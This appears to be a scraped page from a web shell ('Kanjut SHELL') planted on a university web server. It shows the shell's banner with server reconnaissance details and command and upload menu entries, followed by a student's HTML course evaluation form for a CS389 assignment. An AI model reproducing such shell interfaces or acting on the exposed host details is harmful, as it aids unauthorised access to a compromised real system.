Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.225.92.60
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/akshoop/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/akshoop/www/evalForm5.php.save
	<!--
File name: evalForm5.php
Author: Abigail Shoop
Purpose: CS389-Assignment #5
	--!>

<center>
<h2>Course Evaluation Form</h2>
<HR>

<FORM action=EvalAction5.php method=post>
Student Status: 
<INPUT type=radio name=studentStatus value='Freshman'>Freshman
<INPUT type=radio name=studentStatus value='Sophomore'>Sophomore
<INPUT type=radio name=studentStatus value='Junior'>Junior
<INPUT type=radio name=studentStatus value='Senior'>Senior
<P>
Gender:
<INPUT type=radio name=gender value='Female'>Female
<INPUT type=radio name=gender value='Male'>Male
<INPUT type=radio name=gender value='other'>Other
<P>
Course: 
<INPUT type=text size=10 maxlength=35 name=course> 
<P>
Lecture Preparation: 
<INPUT type=radio name=lect_prep value=0>Poor 
<INPUT type=radio name=lect_prep value=1>Average 
<INPUT type=radio name=lect_prep value=2>Good 
<P>
Student Participation: 
<INPUT type=radio name=stu_part value=0>Poor 
<INPUT type=radio name=stu_part value=1>Average 
<INPUT type=radio name=stu_part value=2>Good 
<P> 
Overall Satisfaction: 
<INPUT type=radio name=overall value=0>Poor 
<INPUT type=radio name=overall value=1>Average 
<INPUT type=radio name=overall value=2>Good 
<P>
<INPUT type=submit value="Submit Form"> 
<INPUT type=reset value="Reset Form"> 
</FORM> 
<HR>
links 
</center>


Stv3n404 - 2023